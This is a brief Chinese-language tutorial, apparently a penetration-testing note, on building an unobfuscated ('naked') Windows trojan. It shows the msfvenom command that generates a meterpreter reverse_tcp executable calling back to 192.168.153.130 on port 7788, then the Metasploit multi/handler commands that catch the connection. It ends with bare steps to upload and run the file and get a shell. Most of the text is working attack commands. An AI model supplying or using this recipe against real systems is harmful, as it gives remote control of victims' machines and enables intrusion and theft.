0x0 制作裸奔木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.153.130 LPORT=7788 -f exe > /root/test.exe

0x1 监听7788端口

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.153.130
set lport 7788
run

0x2 上传木马文件

0x3 执行对应文件

0x4 获取shell